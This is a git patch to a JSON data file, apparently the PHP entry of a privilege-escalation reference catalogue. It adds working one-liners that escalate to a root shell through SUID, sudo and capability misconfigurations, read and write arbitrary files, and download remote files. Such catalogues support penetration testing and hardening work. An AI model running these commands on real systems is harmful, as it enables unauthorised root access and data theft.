From 08b481e4f68422b2652b31735bccfae6c605defb Mon Sep 17 00:00:00 2001
From: "Mr. Robot" <t0thkr1s@icloud.com>
Date: Sun, 11 Apr 2021 19:42:27 +0200
Subject: [PATCH] update data source for php

---
 data/php.json | 21 ++++++++++++++++-----
 1 file changed, 16 insertions(+), 5 deletions(-)

diff --git a/data/php.json b/data/php.json
index 11eda56..3e902e7 100644
--- a/data/php.json
+++ b/data/php.json
@@ -37,23 +37,34 @@
     "file-download": [
       {
         "description": "Fetch a remote file via HTTP GET request.",
-        "code": "php -r 'file_put_contents(\"[file]\", file_get_contents(\"[url]\"));'\n"
+        "code": "php -r '$c=file_get_contents(\"[url]\");file_put_contents(\"[file]\", $c);'\n"
       }
     ],
     "suid": [
       {
-        "code": "CMD=\"/bin/sh\"\n./php -r \"pcntl_exec('/bin/sh', ['-p']);\"\n"
+        "code": "./php -r \"pcntl_exec('/bin/sh', ['-p']);\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "CMD=\"/bin/sh\"\nsudo php -r \"system('$CMD');\"\n"
+        "code": "sudo php -r \"system('/bin/sh');\"\n"
       }
     ],
     "capabilities": [
       {
-        "code": "CMD=\"/bin/sh\"\n./php -r \"posix_setuid(0); system('$CMD');\"\n"
+        "code": "./php -r \"posix_setuid(0); system('/bin/sh');\"\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "php -r 'readfile(\"[file]\");'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "write data to a file, filename should be absolute.",
+        "code": "php -r 'file_put_contents(\"[file]\", \"[data]\");'\n"
       }
     ]
   }
-}
\ No newline at end of file
+}